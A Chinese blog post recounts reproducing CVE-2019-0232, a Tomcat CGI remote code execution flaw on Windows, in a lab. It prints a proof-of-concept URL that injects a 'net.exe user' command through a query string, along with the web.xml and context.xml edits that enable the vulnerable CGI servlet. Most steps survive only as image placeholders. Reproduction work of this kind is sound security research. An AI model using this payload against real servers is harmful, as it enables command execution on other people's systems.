算命縖子
生命不息,折腾不止。
© 算命縖子
All Rights Reserved.

复现CVE-2019-0232过程中遇到的坑 Apache Tomcat高危远程代码执行漏洞

起因,一老哥给我发来这玩意,一眼看上去,哇,牛逼。

blob.jpg
blob.jpg

Apache Tomcat高危远程代码执行漏洞
CVE-2019-0232:
Windows上的Apache Tomcat远程执行代码

http:// localhost:8080/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5Cnet.exe+user

参考:https://github.com/pyn3rd/CVE-2019-0232


于是第二天:

blob.jpg

blob.jpg

去官方找的tomcat包

http://archive.apache.org/dist/tomcat/tomcat-8/v8.5.39/src/

blob.jpg

然后第一个坑就是这么来的…

blob.jpg

老哥折腾了半天都没部署好tomcat

然后我还嘲笑了那位老哥,直到我去搞的时候,我才知道错了。

blob.jpg

blob.jpg

blob.jpg

于是我怀疑是tomcat包的问题。

于是我去问了另一个在复现的老哥。

blob.jpg

blob.jpg

blob.jpg

blob.jpg

于是第一个坑就这么解决了,过程差点没搞自闭。折腾了各种环境变量啥的。

blob.jpg

不过那个老哥复现失败了,唔.. 我就知道后面绝对还有等着我。


同时我把解决这个坑的原因告诉了这位老哥。

blob.jpg

接下来按照作者的来改。
conf\web.xml文件:

<servlet>
        <servlet-name>cgi</servlet-name>
        <servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
        <init-param>
          <param-name>debug</param-name>
          <param-value>0</param-value>
        </init-param>
        <init-param>
          <param-name>cgiPathPrefix</param-name>
          <param-value>WEB-INF/cgi-bin</param-value>
        </init-param>
        <init-param>
          <param-name>executable</param-name>
          <param-value></param-value>
        </init-param>
         <load-on-startup>5</load-on-startup>
</servlet> 

conf\content.xml文件

<Context privileged="true">

    <!-- Default set of monitored resources. If one of these changes, the    -->
    <!-- web application will be reloaded.                                   -->
    <WatchedResource>WEB-INF/web.xml</WatchedResource>
    <WatchedResource>${catalina.base}/conf/web.xml</WatchedResource>

    <!-- Uncomment this to disable session persistence across Tomcat restarts -->
    <!--
    <Manager pathname="" />
    -->
</Context>

作者还写了这么一句话

Move WEB-INF to $CATALINA_HOME/webapps/ROOT and start TOMCAT server

翻译成大白话就是
把WEB-INF 移到 $CATALINA_HOME/webapps/ROOT 里面 然后启动tomcat
$CATALINA_HOME就是tomcat的文件目录
WEB-INF就是作者放在github里面的文件

于是去下载

blob.jpg

覆盖到

blob.jpg

于是….

blob.jpg

blob.jpg

我们三又遇到了同样的问题。

hello.bat直接是下载的。压根就没啥执行。

blob.jpg

没办法,大家都遇到同样的问题。接下来只能看自己的了,没有前人带路,自己瞎折腾试试。

自己捣鼓了半天,终于发现问题出现在哪里了。

conf\web.xml文件:

blob.jpg

这里还需要把注释去掉,作者没写明白。

于是乎

blob.jpg

终于搞定了。

blob.jpg

blob.jpg

blob.jpg

blob.jpg

blob.jpg


blob.jpg

blob.jpg

blob.jpg

blob.jpg

blob.jpg


apache-tomcat-8.5.39
链接:https://pan.baidu.com/s/1bwokvUhWxZeRq--6pti_6g
提取码:jdm9

CVE-2019-0232-master
链接:https://pan.baidu.com/s/10NzgiJAqKOjgJCn3bWvS5g
提取码:m6uy

2019-04-18
1,223 views
  1. test

    感觉还是很鸡肋啊,配置要有要求,还要上传个文件。不过大佬研究的热情很赞。

  2. dalao

    大佬可以开启rss订阅吗

  3. 站点网速有些慢,不过这个域名牛逼了。

发表评论